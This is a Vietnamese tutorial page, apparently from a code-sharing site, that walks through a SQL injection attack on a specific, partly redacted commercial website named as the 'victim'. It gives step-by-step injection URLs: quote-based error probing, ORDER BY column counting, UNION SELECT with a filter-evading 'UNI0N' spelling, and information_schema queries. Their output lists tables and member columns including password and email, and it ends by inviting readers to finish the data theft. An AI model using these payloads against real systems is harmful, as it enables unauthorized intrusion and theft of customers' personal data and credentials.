quang cao hosting

Hướng dẫn khai thác sql dạng html

Xem: 1978    Tải: 0   Thảo luận: 0   Mục: MySQL   Lĩnh vực: Khác

9 điểm   ( 12 đánh giá ) File đã được kiểm thử

Khai thác sql dạng HTML

victim lần này là:
http://www.worldwide...ticles-261.html

Thêm dấu ' vào sau những con số
http://www.worldwide...s-261'.html

haha lỗi rồi


Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16

Warning: Cannot modify header information - headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432

Bắt đầu order by
http://www.worldwide...et/articles-261 order by 1-- -.html >>ok
http://www.worldwide...et/articles-261 order by 7-- -.html >> ok
http://www.worldwide...et/articles-261 order by 8-- -.html >> bao loi

>>8-1=7 nhé

bây h UNI0N select :
http://www.worldwide...et/articles-261 UNI0N select 1,2,3,4,5,6,7-- -.html

ui số má đâu hết rồi: , view source , chẳng thấy gì hết chán.

Ghét quá thay số bằng null xem 261=null

http://www.worldwide...t/articles-null UNI0N select 1,2,3,4,5,6,7-- -.html

ui ra rồi 2 và 3 nhé

Tìm các thông tin :version(),database(),user()

http://www.worldwide...t/articles-null UNI0N select 1,2,version(),4,5,6,7-- -.html

Tiếp theo tìm table name
http://www.worldwide...t/articles-null UNI0N select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- -.html

1 đống :
adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers

Tìm table chứa thông tin

Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé
member=0x6d656d626572 (conver to hex nhé)
get column

http://www.worldwide...t/articles-null UNI0N select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_schema=database() and table_name=0x6d656d626572-- -.html

lại ra 1 đống :
id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e

Tới đây là được rồi, mọi cái còn lại đơn giản , ae làm nhé

Hướng dẫn khai thác sql dạng html

Hướng dẫn khai thác sql dạng html Đăng ngày 08-07-2013  Hướng dẫn khai thác sql dạng htm 0.75/10 1978

Thảo luận:

Để bình luận bạn phải đăng nhập thành viên.

File tương tự

  • Lập Trình  website động với  php my sql

    Lập Trình website động với php my sql

    Chuyên mục: MySQL
    Lượt xem: 3486    Lượt tải file: 85   Lĩnh vực: Khác
    FREE   Chúng ta hay thực hiện một chuyến đi thần thoại trong chuyến đi này chúng ta sẽ khám phá ngoại hình cũng như nội tạn của...
  • Tài liệu bảo mật Trong SQL SERVER 2008

    Tài liệu bảo mật Trong SQL SERVER 2008

    Chuyên mục: MySQL
    Lượt xem: 2944    Lượt tải file: 43   Lĩnh vực: Khác
    FREE   Quản trị viên CSDL là người chịu trách nhiệm về hiệu năng, tính toàn vẹn dữ liệu và bảo mật cho CSDL.
  • Quản lý cơ sở dữ liệu với Microsoft SQL Server 2005

    Quản lý cơ sở dữ liệu với Microsoft SQL Server 2005

    Chuyên mục: MySQL
    Lượt xem: 2491    Lượt tải file: 9   Lĩnh vực: Khác
    FREE   Tài liệu sau đây sẽ hướng dẫn bạn cách quản lý cơ sở dữ liệu với Microsoft SQL Server 2005. Hy vọng tài liệu sẽ hữu ích...
  • Bài giảng khai phá dữ liệu

    Bài giảng khai phá dữ liệu

    Chuyên mục: MySQL
    Lượt xem: 2773    Lượt tải file: 7   Lĩnh vực: Khác
    FREE   Tài liệu này cung cấp các kiến thức cơ bản về kho dữ liệu lớn và các kỹ thuật khai phá dữ liệu.

Files cùng mục

 
File gợi ý cho bạn
File tải nhiều nhất
Megacode.vn - Thư viện mã nguồn chia sẻ, tải file cho cộng đồng
Copyright © 2013-2021. All rights reserved. Bản quyền thuộc VinaGon
Email: info@vinagon.com
Hotline: 086.924.3838